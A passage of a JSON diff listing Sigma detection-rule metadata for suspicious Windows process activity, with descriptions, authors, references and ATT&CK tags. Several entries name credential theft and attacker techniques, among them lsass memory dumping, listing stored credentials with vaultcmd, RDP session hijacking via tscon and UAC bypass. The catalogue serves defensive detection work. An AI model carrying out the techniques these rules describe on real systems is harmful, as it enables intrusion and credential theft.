"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ] + }, + "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", + "value": "Suspicious Execution of Systeminfo" + }, + { + "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", + "meta": { + "author": "Florian Roth (rule), David ANDRE (additional keywords)", + "creation_date": "2021/12/20", + "falsepositive": [ + "Administrative activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_system_user_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://tools.thehacker.recipes/mimikatz/modules", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" + ], + "tags": "No established tags" + }, + "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", + "value": "Suspicious SYSTEM User Process Creation" + }, + { + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "meta": { + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2018/04/09", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_sysvol_access.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2288", + "https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.006" + ] + }, + "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", + "value": "Suspicious SYSVOL Domain Group Policy Access" + }, + { + "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "meta": { + "author": "frack113", + "creation_date": "2022/01/30", + "falsepositive": [ + "Scripts created by developers and admins", + "Administrative activity" + ], + "filename": "proc_creation_win_susp_takeown.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_takeown.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.001" + ] + }, + "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "value": "Suspicious Recursive Takeown" + }, + { + "description": "Detects shell32.dll executing a DLL in a suspicious directory", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_target_location_shell32.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.group-ib.com/resources/threat-research/red-curl-2.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218.011" + ] + }, + "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", + "value": "Shell32 DLL Execution in Suspicious Directory" + }, + { + "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_taskkill.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml" + ], + "tags": [ + "attack.impact", + "attack.t1489" + ] + }, + "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", + "value": "Suspicious Execution of Taskkill" + }, + { + "description": "Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network", + "meta": { + "author": "frack113", + "creation_date": "2021/12/11", + "falsepositive": [ + "Administrator, hotline ask to user" + ], + "filename": "proc_creation_win_susp_tasklist_command.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1057" + ] + }, + "uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", + "value": "Suspicious Tasklist Discovery Command" + }, + { + "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_taskmgr_localsystem.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "value": "Taskmgr as LOCAL_SYSTEM" + }, + { + "description": "Detects the creation of a process from Windows task manager", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/13", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_taskmgr_parent.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", + "value": "Taskmgr as Parent" + }, + { + "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", + "meta": { + "author": "Avneet Singh @v3t0_, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_tracker_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", + "value": "DLL Injection with Tracker.exe" + }, + { + "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/10", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_trolleyexpress_procdump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/_xpn_/status/1491557187168178176", + "https://www.youtube.com/watch?v=Ie831jF0bb0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011", + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", + "value": "Process Access via TrolleyExpress Exclusion" + }, + { + "description": "Detects a tscon.exe start as LOCAL SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_tscon_localsystem.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ] + }, + "uuid": "9847f263-4a81-424f-970c-875dab15b79b", + "value": "Suspicious TSCON Start as SYSTEM" + }, + { + "description": "Detects a suspicious RDP session redirect using tscon.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_tscon_rdp_redirect.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", + "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_rdp_redirect.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1563.002", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "value": "Suspicious RDP Redirect Using TSCON" + }, + { + "description": "Detects indicators of a UAC bypass method by mocking directories", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/27", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_uac_bypass_trustedpath.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", + "https://github.com/netero1010/TrustedPath-UACBypass-BOF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_uac_bypass_trustedpath.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548.002" + ] + }, + "uuid": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", + "value": "TrustedPath UAC Bypass Pattern" + }, + { + "description": "Detects a suspicious child process of userinit", + "meta": { + "author": "Florian Roth (rule), Samir Bousseaden (idea)", + "creation_date": "2019/06/17", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_userinit_child.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1139811587760562176", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_userinit_child.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055" + ] + }, + "uuid": "b655a06a-31c0-477a-95c2-3726b83d649d", + "value": "Suspicious Userinit Child Process" + }, + { + "description": "Detects the execution of CSharp interactive console by PowerShell", + "meta": { + "author": "Michael R. (@nahamike01)", + "creation_date": "2020/03/08", + "falsepositive": [ + "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + ], + "filename": "proc_creation_win_susp_use_of_csharp_console.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/detecting-attacks-leveraging-the-net-framework/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_csharp_console.yml" + ], + "tags": [ + "attack.execution", + "attack.t1127" + ] + }, + "uuid": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "value": "Suspicious Use of CSharp Interactive Console" + }, + { + "description": "This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "meta": { + "author": "Agro (@agro_sev) oscd.community", + "creation_date": "2020/10/10", + "falsepositive": [ + "Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action." + ], + "filename": "proc_creation_win_susp_use_of_sqlps_bin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/", + "https://twitter.com/bryon_/status/975835709587075072", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqlps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "0152550d-3a26-4efd-9f0e-54a0b28ae2f3", + "value": "Detection of PowerShell Execution via Sqlps.exe" + }, + { + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.\n", + "meta": { + "author": "Agro (@agro_sev) oscd.communitly", + "creation_date": "2020/10/13", + "falsepositive": [ + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." + ], + "filename": "proc_creation_win_susp_use_of_sqltoolsps_bin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_sqltoolsps_bin.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", + "value": "SQL Client Tools PowerShell Session Detection" + }, + { + "description": "Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces\nAdversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe\n", + "meta": { + "author": "Agro (@agro_sev) oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "It's not an uncommon to use te.exe directly to execute legal TAEF tests" + ], + "filename": "proc_creation_win_susp_use_of_te_bin.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/", + "https://twitter.com/pabraeken/status/993298228840992768", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml" + ], + "tags": [ + "attack.t1218" + ] + }, + "uuid": "634b00d5-ccc3-4a06-ae3b-0ec8444dd51b", + "value": "Malicious Windows Script Components File Execution by TAEF Detection" + }, + { + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "meta": { + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "The process spawned by vsjitdebugger.exe is uncommon." + ], + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/990758590020452353", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", + "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + ], + "tags": [ + "attack.t1218", + "attack.defense_evasion" + ] + }, + "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "value": "Malicious PE Execution by Microsoft Visual Studio Debugger" + }, + { + "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", + "meta": { + "author": "frack113", + "creation_date": "2022/04/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_vaultcmd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vaultcmd.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.004" + ] + }, + "uuid": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "value": "Windows Credential Manager Access via VaultCmd" + }, + { + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "meta": { + "author": "Konstantin Grishchenko, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" + ], + "filename": "proc_creation_win_susp_vboxdrvinst.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", + "https://twitter.com/pabraeken/status/993497996179492864", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vboxdrvinst.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ] + }, + "uuid": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", + "value": "Suspicious VBoxDrvInst.exe Parameters" + }, + { + "description": "Detects suspicious inline VBScript keywords as used by UNC2452", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_vbscript_unc2452.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "value": "Suspicious VBScript UN2452 Pattern" + }, + { + "description": "Detects commands that temporarily turn off Volume Snapshots", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/28", + "falsepositive": [ + "Legitimate administration" + ], + "filename": "proc_creation_win_susp_volsnap_disable.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/0gtweet/status/1354766164166115331", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_volsnap_disable.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", + "value": "Disabled Volume Snapshots" + }, + { + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "meta": { + "author": "bohops", + "creation_date": "2022/10/30", + "falsepositive": [ + "False positives depend on custom use of vsls-agent.exe" + ], + "filename": "proc_creation_win_susp_vslsagent_agentextensionpath_load.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/1583916360404729857", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "43103702-5886-11ed-9b6a-0242ac120002", + "value": "Suspicious Vsls-Agent Command With AgentExtensionPath Load" + }, + { + "description": "A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_webdav_client_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "value": "Suspicious WebDav Client Execution" + }, + { + "description": "Detects suspicious child processes of SysAidServer (as seen in MERCURY threat actor intrusions)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_web_sysaidserver.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_web_sysaidserver.yml" + ], + "tags": "No established tags" + }, + "uuid": "60bfeac3-0d35-4302-8efb-1dd16f715bc6", + "value": "Suspicious SysAidServer Child" + }, + { + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wermgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://www.echotrail.io/insights/search/wermgr.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" + ], + "tags": "No established tags" + }, + "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "value": "Suspicious WERMGR Process Patterns" + }, + { + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "meta": { + "author": "frack113, Nasreddine Bencherchali", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_where_execution.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ] + }, + "uuid": "725a9768-0f5e-4cb3-aec2-bc5719c6831a", + "value": "Suspicious Where Execution" + }, + { + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation but rarely used by administrators", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/08/13", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_whoami.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "value": "Whoami Execution" + }, + { + "description": "Detects the execution of whoami with suspicious parents or parameters", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/12", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" + ], + "filename": "proc_creation_win_susp_whoami_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://brica.de/alerts/alert/public/1247926/agent-tesla-keylogger-delivered-inside-a-power-iso-daa-archive/", + "https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/", + "https://www.youtube.com/watch?v=DsJ9ByX84o4&t=6s", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_anomaly.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "8de1cbe8-d6f5-496d-8237-5f44a721c7a0", + "value": "Whoami Execution Anomaly" + }, + { + "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_whoami_as_param.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blackarrowsec/status/1463805700602224645?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_whoami_as_param.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "value": "WhoAmI as Parameter" + }, + { + "description": "Detects a suspicious winrar execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" + ], + "filename": "proc_creation_win_susp_winrar_dmp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_dmp.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", + "value": "Winrar Compressing Dump Files" + }, + { + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "meta": { + "author": "Florian Roth, Tigzy", + "creation_date": "2021/11/17", + "falsepositive": [ + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + ], + "filename": "proc_creation_win_susp_winrar_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1460978167628406785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrar_execution.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", + "value": "Winrar Execution in Non-Standard Folder" + }, + { + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_winrm_awl_bypass.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_awl_bypass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "value": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl" + }, + { + "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Legitimate use for administartive purposes. Unlikely" + ], + "filename": "proc_creation_win_susp_winrm_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/994405551751815170", + "https://redcanary.com/blog/lateral-movement-winrm-wmi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", + "value": "Remote Code Execute via 